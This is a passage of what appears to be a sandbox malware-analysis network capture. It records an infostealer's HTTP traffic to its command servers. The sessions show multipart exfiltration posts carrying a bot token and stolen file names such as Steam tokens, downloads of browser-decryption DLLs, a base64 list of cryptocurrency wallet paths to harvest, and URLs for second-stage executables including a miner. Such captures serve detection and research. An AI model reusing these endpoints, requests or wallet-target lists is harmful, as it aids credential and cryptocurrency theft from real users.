0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="file"------IEHCBAFIDAECBGCBFHJE--
Jul 26, 2024 20:09:07.336998940 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 20:09:08.126370907 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAA Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file"------KKEHIEBKJKFIEBGDGDAA--
Jul 26, 2024 20:09:08.904242039 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 20:09:09.699157953 CEST	90	OUT	GET /8405906461a5200c/freebl3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 20:09:09.878688097 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:09 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Jul 26, 2024 20:09:10.604073048 CEST	90	OUT	GET /8405906461a5200c/mozglue.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 20:09:11.027595997 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:10 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Jul 26, 2024 20:09:11.447043896 CEST	91	OUT	GET /8405906461a5200c/msvcp140.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 20:09:11.629482985 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:11 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Jul 26, 2024 20:09:12.141372919 CEST	87	OUT	GET /8405906461a5200c/nss3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 20:09:12.364027977 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:12 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Jul 26, 2024 20:09:13.957783937 CEST	91	OUT	GET /8405906461a5200c/softokn3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 20:09:14.147563934 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:14 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Jul 26, 2024 20:09:14.384673119 CEST	95	OUT	GET /8405906461a5200c/vcruntime140.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 20:09:14.570467949 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:14 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Jul 26, 2024 20:09:15.276213884 CEST	199	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJE Host: 85.28.47.31 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 20:09:15.918329954 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 20:09:16.008186102 CEST	465	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG Host: 85.28.47.31 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="message"wallets------IIEBGIDAAFHIJJJJEGCG--
Jul 26, 2024 20:09:16.202373028 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:16 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Jul 26, 2024 20:09:16.206156969 CEST	470	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH Host: 85.28.47.31 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 2d 2d 0d 0a Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="message"ybncbhylepme------GCAKKECAEGDGCBFIJEGH--
Jul 26, 2024 20:09:16.395227909 CEST	359	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:16 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 132 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 33 4e 76 61 32 45 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4d 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 67 31 4c 6a 49 78 4e 53 34 78 4d 54 4d 75 4d 54 59 76 62 57 6c 75 5a 53 39 6c 62 6e 52 6c 63 69 35 6c 65 47 56 38 4d 48 77 77 66 46 4e 30 59 58 4a 30 66 44 4a 38 Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L3Nva2EvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8MnxodHRwOi8vMTg1LjIxNS4xMTMuMTYvbWluZS9lbnRlci5leGV8MHwwfFN0YXJ0fDJ8
Jul 26, 2024 20:09:20.961639881 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKE Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="file"------AFCBAEBAEBFHCAKFCAKE--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	185.215.113.16	80	3436	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:09:16.408029079 CEST	80	OUT	GET /soka/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Jul 26, 2024 20:09:17.190546989 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:09:17 GMT Content-Type: application/octet-stream Content-Length: 1898496 Last-Modified: Fri, 26 Jul 2024 17:32:44 GMT Connection: keep-alive ETag: "66a3ddbc-1cf800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 